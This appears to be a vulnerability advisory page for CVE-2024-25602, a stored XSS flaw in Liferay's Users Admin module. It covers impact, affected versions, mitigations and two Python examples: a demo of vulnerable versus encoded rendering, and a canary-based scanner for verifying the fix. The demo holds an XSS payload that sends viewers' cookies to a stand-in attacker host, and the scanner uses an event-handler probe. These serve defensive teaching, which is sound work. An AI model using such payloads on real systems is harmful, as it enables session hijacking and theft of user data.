Platform
java
Component
users-admin-module
Fixed in
7.4.3
7.3.11
7.2.11
CVE-2024-25602 is a stored cross-site scripting (XSS) vulnerability in the Users Admin module of Liferay Portal and Liferay DXP. A remote, authenticated user can inject arbitrary web script or HTML via a crafted payload saved in an organization user profile's 'Name' text field; the value is stored and later rendered, unencoded, to anyone who views the profile. Affected versions are Liferay Portal 7.2.0 through 7.4.2 and older unsupported versions, Liferay DXP 7.3 before service pack 3, and Liferay DXP 7.2 before fix pack 17. A fix is available in Liferay Portal 7.4.3.
Successful exploitation lets an attacker whose account can edit an organization user profile plant JavaScript that runs in the browser, and with the session, of every other authenticated user who later views that profile. Because the script executes as the viewer, the impact follows the viewer's privileges: session or account takeover, exfiltration of data visible to that user, actions performed on their behalf inside the portal, or defacement. Administrators who review user profiles are the natural high-value targets, so the blast radius is every authenticated user who opens the poisoned profile, not just the attacker's own session. The root cause is the usual one for stored XSS: user-supplied data is persisted and later written into a page without output encoding.
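To make the store-then-render mechanism concrete, here is an added Python sketch. It is not Liferay code and not taken from the advisory; the in-memory store and the two renderers are assumed stand-ins for the Users Admin module's save and display path, and the sample names are constructed. The only difference between the vulnerable and fixed renderer is HTML encoding at the point of output.

```python
import html

# Constructed sample values (not from the advisory). The first is the kind of
# payload the advisory describes: markup typed into an organization user
# profile's 'Name' field. The second shows that encoding is harmless for
# legitimate names containing special characters.
MALICIOUS_NAME = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'
BENIGN_NAME = "Ada O'Neill & Sons"

# Stand-in for the portal's persistence layer (assumption: not Liferay's API).
profile_store = {}


def save_profile_name(user_id, name):
    """Stored XSS, step 1: the submitted name is persisted exactly as typed.
    Storing raw input is not itself the bug; the bug is what happens on output."""
    profile_store[user_id] = name


def render_profile_vulnerable(user_id):
    """Pre-fix behaviour: the stored value is concatenated straight into the page,
    so any markup in it becomes live HTML in every viewer's browser."""
    return f'<div class="user-profile"><h1>{profile_store[user_id]}</h1></div>'


def render_profile_fixed(user_id):
    """Post-fix behaviour: HTML-encode at the point of output.
    quote=True also encodes ' and ", which matters when a value is ever
    placed inside an attribute rather than element text."""
    safe = html.escape(profile_store[user_id], quote=True)
    return f'<div class="user-profile"><h1>{safe}</h1></div>'


def main():
    # The attacker edits the profile once...
    save_profile_name(1001, MALICIOUS_NAME)
    save_profile_name(1002, BENIGN_NAME)
    # ...and every authenticated viewer who opens it receives the payload.
    for viewer in ("admin", "colleague", "auditor"):
        print(f"[{viewer}] vulnerable: {render_profile_vulnerable(1001)}")
        print(f"[{viewer}] fixed:      {render_profile_fixed(1001)}")
    # A legitimate name survives encoding intact once the browser decodes it.
    print(render_profile_fixed(1002))


if __name__ == "__main__":
    main()
```

In the vulnerable output the `<img>` tag lands in the page as an element and its `onerror` handler runs for each viewer; in the fixed output the same bytes arrive as `&lt;img ...&gt;` and are displayed as literal text.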
CVE-2024-25602 was publicly disclosed on February 21, 2024. No active exploitation has been publicly confirmed, and the EPSS score shown on this page (0.15%, 36th percentile) reflects that: exploitation requires an authenticated account permitted to edit an organization user profile, plus a victim who views it. That makes this a moderate-severity stored XSS rather than a critical one. It still warrants prompt remediation, because a working payload can be derived from the advisory description alone, so the absence of a published proof of concept offers little protection, and the victims are the privileged users most likely to browse profiles.
Exploit Status
EPSS
0.15% (36th percentile)
The primary mitigation for CVE-2024-25602 is to upgrade Liferay Portal to 7.4.3 or later (or the corresponding Liferay DXP service pack or fix pack). If an immediate upgrade is not feasible, reduce exposure in the meantime. Limit which accounts hold permission to edit organization user profiles, since the attacker must be authenticated and able to write the 'Name' field. If the field is rendered by a custom module or theme, HTML-encode it on output; input validation alone is not a complete solution, and output encoding is what the fix amounts to. A web application firewall in front of the Users Admin module can block obvious XSS payloads in profile-update requests, with the caveat that WAF rules are bypassable and only buy time. A Content-Security-Policy that disallows inline script is a further defence-in-depth layer that blunts an injected event handler even while the encoding bug is present. Monitor for profile edits containing angle brackets, quotes or `javascript:` URIs; standard access logs do not record POST bodies, so this needs request-level or audit logging at the portal or reverse proxy. After upgrading, confirm the fix in a non-production copy: save a harmless marker payload such as `<b>marker</b>` in the 'Name' field, view the profile as a different user, and inspect the raw HTML to verify that `<`, `>`, `"` and `'` come back as entities rather than as markup.
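The post-upgrade check above can be scripted rather than eyeballed. The following added Python example is not from the advisory or from Liferay; the canary token, probe payload and the two sample responses are constructed here to stand in for the profile page fetched from a pre-fix and a post-fix instance. Against a real instance you would fetch the profile page with an authenticated session and pass the response body to `payload_was_neutralised`. The scanner only reports success if the canary reached the page as inert text, which distinguishes "encoded" from "silently stripped".

```python
from html.parser import HTMLParser

# Canary token and probe payload, constructed for this check (not from the
# advisory). The payload pairs an event-handler injection with a plain-text
# copy of the canary so "encoded" can be told apart from "dropped entirely".
CANARY = "xsscanary7f3a"
PROBE_PAYLOAD = f'<svg onload="alert(\'{CANARY}\')"><b>{CANARY}</b>'

# Constructed sample responses: the profile page as a pre-fix and a post-fix
# instance would return it after PROBE_PAYLOAD was saved as the 'Name' value.
VULNERABLE_RESPONSE = (
    '<html><body><div class="user-profile"><h1>'
    f'{PROBE_PAYLOAD}'
    '</h1></div></body></html>'
)
FIXED_RESPONSE = (
    '<html><body><div class="user-profile"><h1>'
    f'&lt;svg onload=&quot;alert(&#x27;{CANARY}&#x27;)&quot;&gt;&lt;b&gt;{CANARY}&lt;/b&gt;'
    '</h1></div></body></html>'
)


class CanaryScanner(HTMLParser):
    """Records every place the canary lands where a browser could execute it:
    a tag name, an attribute value (event handlers, javascript: URLs) or a
    <script> body. Canary text in ordinary element content is harmless."""

    def __init__(self, canary):
        super().__init__()
        self.canary = canary
        self.findings = []
        self.seen_as_text = False
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if self.canary in tag:
            self.findings.append(f"tag <{tag}>")
        for name, value in attrs:
            if value is not None and self.canary in value:
                self.findings.append(f"attribute {name} on <{tag}>")
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Entities such as &lt; are decoded into data here, so an encoded
        # payload shows up as text containing '<svg ...' and is not a finding.
        if self.canary in data:
            if self._in_script:
                self.findings.append("script body")
            else:
                self.seen_as_text = True


def scan(page_html, canary=CANARY):
    """Parse a response body and return the scanner with its findings."""
    scanner = CanaryScanner(canary)
    scanner.feed(page_html)
    scanner.close()
    return scanner


def payload_was_neutralised(page_html, canary=CANARY):
    """True only if the canary reached the page as inert text and nowhere executable.
    A page that never shows the canary at all also fails: either the wrong
    profile was fetched or the value was stripped, and neither proves encoding."""
    result = scan(page_html, canary)
    return result.seen_as_text and not result.findings


if __name__ == "__main__":
    for label, body in (("pre-fix", VULNERABLE_RESPONSE), ("post-fix", FIXED_RESPONSE)):
        result = scan(body)
        verdict = "neutralised" if payload_was_neutralised(body) else "EXECUTABLE"
        print(f"{label}: {verdict} findings={result.findings}")
```

Using an HTML parser rather than a substring search matters: a naive check for the string `<svg` would also fire on the post-fix page once entities are decoded, whereas the parser sees the decoded text as data, not as a start tag.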
Update Liferay Portal to 7.4.3 or later (any release after 7.4.2), Liferay DXP 7.3 to service pack 3 or later, or Liferay DXP 7.2 to fix pack 17 or later. These releases correct the stored XSS vulnerability in the Users Admin module.
CVE-2024-25602 is a stored cross-site scripting (XSS) vulnerability in Liferay Portal's Users Admin module, allowing attackers to inject malicious scripts.
You are affected if you are running Liferay Portal versions 7.2.0–7.4.2, or older unsupported versions, and Liferay DXP versions prior to service pack 3 for 7.3 and prior to fix pack 17 for 7.2.
Upgrade to Liferay Portal 7.4.3 or later to remediate the vulnerability. Consider temporary workarounds like input validation and WAF rules if immediate upgrading is not possible.
No active exploitation campaigns have been publicly confirmed, and the EPSS score is low (0.15%). Exploitation requires an authenticated account that can edit an organization user profile and a victim who views it, so the practical risk is moderate and concentrated on the administrators most likely to browse user profiles; it still merits prompt patching.
Refer to the official Liferay security advisory for detailed information and mitigation steps: [https://liferay.com/security-advisories/liferay-portal-and-dxp-security-vulnerability-xss-in-users-admin-module](https://liferay.com/security-advisories/liferay-portal-and-dxp-security-vulnerability-xss-in-users-admin-module)